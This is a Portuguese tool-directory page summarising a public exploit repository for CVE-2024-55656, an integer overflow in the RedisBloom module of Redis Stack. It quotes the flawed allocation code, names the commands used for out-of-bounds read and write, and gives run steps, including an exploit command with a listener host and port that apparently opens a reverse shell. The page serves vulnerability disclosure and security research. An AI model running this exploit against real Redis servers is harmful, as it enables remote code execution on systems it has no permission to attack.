Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
redis-stack-CVE-2024-55656 | Kitploit
Ferramentas/GitHubGitHub/rick2600/redis-stack-cve-2024-55656
Forensia de MemóriaAnálise de VulnerabilidadesExploraçãoTestes de PenetraçãoSegurança de Banco de DadosExploração de Binários
GitHubrick2600/redis-stack-cve-2024-55656

redis-stack-CVE-2024-55656

Ver Repositório
há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2024-55656 - Redis Stack - Vulnerabilidade de Execução Remota de Código por Estouro de Inteiro no RedisBloom

  • Título: Redis Stack RedisBloom - Vulnerabilidade de Execução Remota de Código por Estouro de Inteiro
  • ZDI: ZDI-25-009
  • CVE: CVE-2024-55656
  • Créditos: rick2600 e gqsilva
  • CVSS: 8.8 (ALTO)
  • Versão afetada: RedisBloom v2.6.12 incluído no Redis Stack 7.2.0-v10

Análise (Versão Resumida)

Existe uma vulnerabilidade de estouro de inteiro no RedisBloom (https://github.com/RedisBloom/RedisBloom), que é um módulo utilizado no redis (https://redis.io/docs/latest/develop/data-types/probabilistic/bloom-filter/). A vulnerabilidade de estouro de inteiro permite que um atacante (um cliente redis que conhece a senha) aloque menos memória no heap do que a memória necessária, devido ao wraparound. Em seguida, leitura e escrita podem ser realizadas além dessa memória alocada, levando a vazamento de informações e à escrita OOB.

O estouro de inteiro está no comando CMS.INITBYDIM, que inicializa um Count-Min Sketch com dimensões especificadas pelo usuário. Ele aceita dois valores (width e depth) e os utiliza para alocar memória em NewCMSketch().

Arquivo: src/cms.c

root@kitploit:~
CMSketch *NewCMSketch(size_t width, size_t depth) {
    assert(width > 0);
    assert(depth > 0);

    CMSketch *cms = CMS_CALLOC(1, sizeof(CMSketch));

    cms->width = width;
    cms->depth = depth;
    cms->counter = 0;
    cms->array = CMS_CALLOC(width * depth, sizeof(uint32_t));

    return cms;
}

A leitura OOB é alcançada através do comando CMS.QUERY implementado em CMS_Query().

A escrita OOB é alcançada através do comando CMS.INCRBY implementado em CMS_IncrBy().

Para análise completa, consulte o aviso

Prova de Conceito

  1. Inicie o redis-stack

docker run -p 6379:6379 --name redis-stack redis/redis-stack:7.2.0-v10

  1. Execute o exploit

python exploit.py --host 172.17.0.2 --port 6379 --lhost 172.17.0.1 --lport 4444

Referências

  1. https://www.zerodayinitiative.com/advisories/ZDI-25-009/
  2. https://github.com/RedisBloom/RedisBloom/security/advisories/GHSA-x5rx-rmq3-ff3h
  3. https://redis.io/blog/security-advisory-cve-2024-46981-cve-2024-51737-cve-2024-51480-cve-2024-55656/
Baixar ferramenta